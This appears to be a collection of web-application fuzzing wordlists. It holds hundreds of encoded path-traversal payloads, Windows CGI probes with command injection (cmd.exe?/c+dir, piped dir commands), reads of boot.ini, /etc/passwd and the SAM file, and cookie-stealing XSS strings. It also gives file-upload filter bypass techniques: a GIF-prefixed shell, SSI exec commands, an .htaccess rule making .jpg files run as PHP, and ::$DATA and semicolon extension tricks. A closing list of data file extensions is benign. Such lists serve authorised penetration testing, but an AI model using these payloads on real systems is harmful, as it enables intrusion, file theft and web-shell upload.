%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}
%c0%2e%c0%2e%c0%2f{FILE}
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}
..%c0%5c{FILE}
..%c0%5c..%c0%5c{FILE}
..%c0%5c..%c0%5c..%c0%5c{FILE}
..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}
%c0%2e%c0%2e\{FILE}
%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}
%c0%2e%c0%2e%c0%5c{FILE}
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}
///%2e%2e%2f{FILE}
///%2e%2e%2f%2e%2e%2f{FILE}
///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
\\\%2e%2e%5c{FILE}
\\\%2e%2e%5c%2e%2e%5c{FILE}
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
..//{FILE}
..//..//{FILE}
..//..//..//{FILE}
..//..//..//..//{FILE}
..//..//..//..//..//{FILE}
..//..//..//..//..//..//{FILE}
..//..//..//..//..//..//..//{FILE}
..//..//..//..//..//..//..//..//{FILE}
..///{FILE}
..///..///{FILE}
..///..///..///{FILE}
..///..///..///..///{FILE}
..///..///..///..///..///{FILE}
..///..///..///..///..///..///{FILE}
..///..///..///..///..///..///..///{FILE}
..///..///..///..///..///..///..///..///{FILE}
..\\{FILE}
..\\..\\{FILE}
..\\..\\..\\{FILE}
..\\..\\..\\..\\{FILE}
..\\..\\..\\..\\..\\{FILE}
..\\..\\..\\..\\..\\..\\{FILE}
..\\..\\..\\..\\..\\..\\..\\{FILE}
..\\..\\..\\..\\..\\..\\..\\..\\{FILE}
..\\\{FILE}
..\\\..\\\{FILE}
..\\\..\\\..\\\{FILE}
..\\\..\\\..\\\..\\\{FILE}
..\\\..\\\..\\\..\\\..\\\{FILE}
..\\\..\\\..\\\..\\\..\\\..\\\{FILE}
..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}
./\/./{FILE}
./\/././\/./{FILE}
./\/././\/././\/./{FILE}
./\/././\/././\/././\/./{FILE}
./\/././\/././\/././\/././\/./{FILE}
./\/././\/././\/././\/././\/././\/./{FILE}
./\/././\/././\/././\/././\/././\/././\/./{FILE}
./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}
.\/\.\{FILE}
.\/\.\.\/\.\{FILE}
.\/\.\.\/\.\.\/\.\{FILE}
.\/\.\.\/\.\.\/\.\.\/\.\{FILE}
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}
./../{FILE}
./.././../{FILE}
./.././.././../{FILE}
./.././.././.././../{FILE}
./.././.././.././.././../{FILE}
./.././.././.././.././.././../{FILE}
./.././.././.././.././.././.././../{FILE}
./.././.././.././.././.././.././.././../{FILE}
.\..\{FILE}
.\..\.\..\{FILE}
.\..\.\..\.\..\{FILE}
.\..\.\..\.\..\.\..\{FILE}
.\..\.\..\.\..\.\..\.\..\{FILE}
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}
.//..//{FILE}
.//..//.//..//{FILE}
.//..//.//..//.//..//{FILE}
.//..//.//..//.//..//.//..//{FILE}
.//..//.//..//.//..//.//..//.//..//{FILE}
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}
.\\..\\{FILE}
.\\..\\.\\..\\{FILE}
.\\..\\.\\..\\.\\..\\{FILE}
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}
../{FILE}
../..//{FILE}
../..//../{FILE}
../..//../..//{FILE}
../..//../..//../{FILE}
../..//../..//../..//{FILE}
../..//../..//../..//../{FILE}
../..//../..//../..//../..//{FILE}
..\{FILE}
..\..\\{FILE}
..\..\\..\{FILE}
..\..\\..\..\\{FILE}
..\..\\..\..\\..\{FILE}
..\..\\..\..\\..\..\\{FILE}
..\..\\..\..\\..\..\\..\{FILE}
..\..\\..\..\\..\..\\..\..\\{FILE}
..///{FILE}
../..///{FILE}
../..//..///{FILE}
../..//../..///{FILE}
../..//../..//..///{FILE}
../..//../..//../..///{FILE}
../..//../..//../..//..///{FILE}
../..//../..//../..//../..///{FILE}
..\\\{FILE}
..\..\\\{FILE}
..\..\\..\\\{FILE}
..\..\\..\..\\\{FILE}
..\..\\..\..\\..\\\{FILE}
..\..\\..\..\\..\..\\\{FILE}
..\..\\..\..\\..\..\\..\\\{FILE}
..\..\\..\..\\..\..\\..\..\\\{FILE}

Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)

# Common Windows CGI   (Update: 17 March 2010)
# fuzz inside executable directories
# on windows, this is usually /scripts or /cgi-bin
# [email protected]

cart32.exe
get32.exe
visadmin.exe
foxweb.exe
webplus.exe?about
fpsrvadm.exe
MsmMask.exe
cmd.exe?/c+dir
cmd1.exe?/c+dir
post32.exe|dir%20c:\\
cgitest.exe
hpnst.exe?c=p+i=
Pbcgi.exe
testcgi.exe
webfind.exe?keywords=01234567890123456789
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C
test-cgi.exe?<script>alert(document.cookie)</script>
athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['
mkilog.exe
mkplog.exe
MsmMask.exe?mask=/junk334
MsmMask.exe?mask=/junk334
MsmMask.exe?mask=/junk334
MsmMask.exe?mask=/junk334
MsmMask.exe?mask=/junk334
perl.exe?-v
perl.exe
ppdscgi.exe
c32web.exe/ChangeAdminPassword
windmail.exe
dbmlparser.exe
cgimail.exe
minimal.exe
rguest.exe
visitor.exe
webbbs.exe
wguest.exe
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15
cfgwiz.exe
Cgitest.exe
mailform.exe
post16.exe
imagemap.exe
htimage.exe/path/filename?2,2
htimage.exe
Webnews.exe
texis.exe/junk
apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
sensepost.exe?/c+dir
testcgi.exe
testcgi.exe?<script>alert(document.cookie)</script>
ion-p.exe?page=c:\winnt\repair\sam
../../../../../../../../../../WINNT/system32/ipconfig.exe
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf 
foxweb.dll
wconsole.dll
shtml.dll
scripts/slxweb.dll/getfile?type=Library&file=[invalid filename]
rightfax/fuwww.dll/?
WINDMAIL.EXE?%20-n%20c:\boot.ini%
WINDMAIL.EXE?%20-n%20c:\boot.ini%[email protected]%20|%20dir%20c:\\
GW5/GWWEB.EXE
GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
GW5/GWWEB.EXE?HELP=bad-request
GWWEB.EXE?HELP=bad-request
echo.bat
echo.bat?&dir+c:\\
hello.bat?&dir+c:\\
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
input2.bat?|dir
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
test-cgi.bat
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,

File Upload Filter Bypass (Update: 17 March 2010 - notes only)

# File Upload Fuzzfile - File Name Filter Bypass
# [email protected]
# released under creative commons license

# For MIME filter bypass, your shellscript should look like
# -------
# GIF89aP;
# [shell]
# -------
#
# For mod_cgi Server Side Include upload attacks
#
#<!--#exec cmd="ls" -->
#
#or, on Windows
#
#<!--#exec cmd="dir" -->
#
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumerated on the servers, and try the commonly writable directory fuzzfile.
#
# example .htaccess that sets mime type .jpg to be executable:
# -----
# AddType application/x-httpd-php .jpg
# -----

File Upload Filter Bypass - Generic (Update: 6 April 2010)

# [email protected]
# released under creative commons license
# 
%00index.html
;index.html

File Upload Filter Bypass - PHP Specific (Update: 6 April 2010)

# [email protected]
# released under creative commons license
# 
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/  to create a .jpg image with the meta comment field set to:
# -----
#<?php phpinfo(); ?> 
#-----
{PHPSCRIPT}
{PHPSCRIPT}.phtml
{PHPSCRIPT}.php.html
{PHPSCRIPT}.php.php.rar 
{PHPSCRIPT}.php.rar 
# PHP on Windows
{PHPSCRIPT}.php::$DATA

File Upload Filter Bypass - Microsoft Specific (Update: 6 April 2010)

# [email protected]
# released under creative commons license
# 
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/  to create a .jpg image with the meta comment field set to:
# -----
#<?php phpinfo(); ?> 
#-----
{PHPSCRIPT}
{PHPSCRIPT}.phtml
{PHPSCRIPT}.php.html
{PHPSCRIPT}.php::$DATA
{PHPSCRIPT}.php.php.rar 
{PHPSCRIPT}.php.rar 

Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)

# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010
# [email protected]
# released under creative commons license

%00index.html
;index.html

PHP-Specific Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)

# PHP-Specific File Upload Filter Bypass Appends  (Update: 17 March 2010 - notes
# [email protected]
# released under creative commons license
# also: use "gim" to create a .jpg image with the meta comment field set to:
# -----
#<?php phpinfo(); ?> 
#-----

{PHPSCRIPT}
{PHPSCRIPT}.phtml
{PHPSCRIPT}.php.html
{PHPSCRIPT}.php::$DATA
{PHPSCRIPT}.php.php.rar 
{PHPSCRIPT}.php.rar
{PHPSCRIPT}.php.doc
{PHPSCRIPT}.php.xls
{PHPSCRIPT}.php.xlsx
{PHPSCRIPT}.php.pdf
{PHPSCRIPT}.php.jpeg
{PHPSCRIPT}.php.gif
{PHPSCRIPT}.php.zip

Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)

# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009
# [email protected]
# released under creative commons license

{ASPSCRIPT}
{ASPSCRIPT};
{ASPSCRIPT};.jpg
{ASPSCRIPT};.pdf
{ASPSCRIPT};.html
{ASPSCRIPT};.htm
{ASPSCRIPT};.txt
{ASPSCRIPT};.xyz
{ASPSCRIPT};.zip
{ASPSCRIPT};.tgz
{ASPSCRIPT};.doc
{ASPSCRIPT};.docx
{ASPSCRIPT};.xls
{ASPSCRIPT};.xlsx

Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends (Update: 10 April 2010 - Total Statements: 9)

#Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends  (Update: 17 March 2010) 
# [email protected]
# released under creative commons license

{PREFIX}/templates_compiled/
{PREFIX}/templates_c/
{PREFIX}/templates/
{PREFIX}/temporary/
{PREFIX}/images/
{PREFIX}/cache/
{PREFIX}/temp/
{PREFIX}/files/
{PREFIX}/tmp/

Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863)

 #Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863
# [email protected]
# released under creative commons license

<pre>
.$er
.123
.1pe
.1ph
.3dr
.3dt
.3me
.3pe
.4dl
.4dv
.8xk
.^^^
.a3l
.a3m
.a3w
.a4l
.a4m
.a4w
.a5l
.a5w
.a65
.aao
.ab
.ab1
.ab2
.ab3
.abcd
.abi
.abp
.aby
.aca
.acc
.accdb
.acf
.acg
.ade
.adp
.adt
.adx
.aft
.agd
.aifb
.alc
.ald
.ali
.amb
.amsorm
.an1
.anme
.apr
.arc
.arh
.ask
.asm
.ast
.at5
.att
.aw
.awg
.azw
.bafl
.bci
.bcm
.bdf
.bdic
.bfx
.bgl
.bgt
.bin
.bjo
.bk
.bkk
.blb
.bld
.blg
.bok
.box
.brd
.brw
.btf
.btif
.btm
.btr
.cap
.cat
.cbg
.cch
.ccr
.cct
.cdb
.cdd
.cdf
.cdp
.cdr
.cdx
.cel
.celtx
.chg
.chk
.chn
.ckd
.ckt
.cl2
.cl4
.clb
.clix
.clm
.clp
.cmbl
.cna
.contact
.cpi
.cpmz
.crd
.crtx
.csa
.csv
.ctf
.ctt
.cursorfx
.curxptheme
.cvd
.cvn
.cwk
.cws
.cwz
.cxt
.cyo
.cys
.daf
.dal
.dam
.das
.dat
.data
.db
.db2
.db3
.dbc
.dbd
.dbf
.dbx
.dcf
.dcl
.dcm
.dcmd
.ddc
.ddcx
.ddt
.dem
.des
.dex
.dfm
.dfproj
.dft
.dgb
.dif
.dii
.dlg
.dm2
.dmo
.dmsk
.dnc
.dockzip
.dp1
.dpn
.dpx
.drl
.dsb
.dsd
.dsk
.dsy
.dsz
.dt0
.dt1
.dt2
.dta
.dtr
.dvdproj
.dvo
.dwi
.e00
.eap
.ebuild
.ec0
.eco
.ecx
.edb
.edf
.eep
.efx
.egp
.emb
.emd
.emlxpart
.enc
.enw
.epp
.epub
.epw
.er1
.esp
.ess
.est
.esx
.et
.eta
.etd
.etl
.ev
.ev3
.evt
.evy
.exif
.exp
.exx
.fa
.fasta
.fbl
.fcd
.fcs
.fdb
.ffd
.ffwp
.fhc
.fid
.fil
.flame
.fll
.flo
.flp
.flt
.fm
.fm5
.fmp
.fo
.fob
.fol
.fop
.fox
.fp
.fp3
.fp4
.fp5
.fp7
.frl
.frm
.fro
.frx
.fsb
.fsc
.ftm
.ftw
.gan
.gbr
.gc
.gcx
.gdb
.ged
.gedcom
.gen
.ggb
.gml
.gms
.gno
.gnp
.gp3
.gpi
.gps
.gpx
.gra
.grade
.grf
.grib
.grk
.grr
.grv
.gs
.gst
.gtp
.gwk
.gxl
.hcc
.hce
.hci
.hcp
.hcr
.hcu
.hda
.hdb
.hdf
.hdi
.hdl
.hif
.hl
.hml
.hmt
.hs2
.hsk
.hst
.htg
.huh
.hyv
.i5z
.ib
.ics
.id2
.idx
.igc
.ihx
.ii
.iif
.img
.imt
.ink
.inp
.ins
.ip
.irock
.irr
.irx
.isf
.itdb
.itl
.itm
.itn
.itw
.itx
.ivt
.iw
.ixb
.jasper
.jdb
.jef
.jmp
.jnt
.job
.joboptions
.joined
.jph
.jrprint
.jrxml
.jude
.kap
.kdb
.kid
.kismac
.kmz
.kpf
.kpp
.kpr
.kpx
.kpz
.l
.l6t
.laccdb
.lbl
.lbx
.lcd
.lcf
.lcm
.ldif
.lex
.lgc
.lgf
.lgh
.lgi
.lgl
.lib
.lif
.livereg
.liveupdate
.lix
.llb
.lms
.lmx
.lnt
.loc
.lp7
.lrf
.lrs
.lrx
.lsf
.lsl
.lsp
.lsr
.lst
.lsu
.lvm
.lw4
.ly
.m
.mag
.mai
.map
.masseffectprofile
.mat
.mbb
.mbf
.mbg
.mbl
.mbp
.mbx
.mc1
.mc9
.mcd
.md
.mdb
.mdc
.mdf
.mdl
.mdm
.mdn
.mdt
.mdx
.mdz
.mem
.menc
.met
.mex
.mfo
.mfp
.mgc
.mls
.mm
.mmap
.mmc
.mmf
.mmp
.mnc
.mng
.mnk
.mno
.mny
.mobi
.moho
.mosaic
.mox
.mpd
.mpj
.mpp
.mpt
.mpx
.mpz
.mq4
.ms10
.mth
.mtw
.mud
.muf
.mw
.mwf
.mws
.mwx
.mxd
.myd
.myi
.nb
.nc
.ndf
.ndk
.ndx
.net
.neta
.nfo
.nitf
.nmind
.not
.notebook
.np
.npl
.npt
.nrl
.ns2
.ns3
.ns4
.nsf
.ntx
.numbers
.nvl
.nyf
.oab
.obj
.odb
.odf
.odp
.ods
.odx
.oeaccount
.ofc
.ofm
.oft
.ofx
.omcs
.omp
.ond
.one
.oo3
.opf
.opx
.or2
.or3
.or4
.or5
.or6
.org
.orx
.otf
.otl
.otln
.ots
.out
.ov2
.ova
.ovf
.p96
.p97
.pab
.paf
.pan
.pbd
.pc
.pcap
.pcb
.pcr
.pd4
.pd5
.pdas
.pdb
.pdd
.pdm
.pds
.pdx
.peb
.pec
.pep
.pex
.pfc
.pfl
.phb
.phm
.pi
.pis
.pjx
.pka
.pkb
.pkh
.pks
.pkt
.pln
.plw
.pmo
.pmr
.pnproj
.pnpt
.pns
.pnt
.pod
.poi
.pos
.postal
.pot
.potm
.potx
.pp2
.ppf
.pps
.ppsx
.ppt
.pptm
.pptx
.prc
.pre
.prf
.prj
.prm
.prs
.psa
.psf
.psm
.pst
.ptb
.ptf
.ptk
.ptm
.ptn
.ptt
.ptz
.pvl
.pwd
.pxj
.pxl
.q07
.q08
.q09
.q3d
.qbw
.qdat
.qdf
.qdfm
.qel
.qfx
.qif
.qpb
.qpf
.qph
.qpm
.qpw
.qrp
.qsd
.ral
.rbt
.rcd
.rcg
.rdb
.rdf
.rdx
.ref
.ret
.rf1
.rfa
.rfo
.rge
.rgn
.rgo
.rmuf
.rnq
.rod
.rog
.roi
.rou
.rpp
.rpt
.rrt
.rsc
.rsd
.rsw
.rte
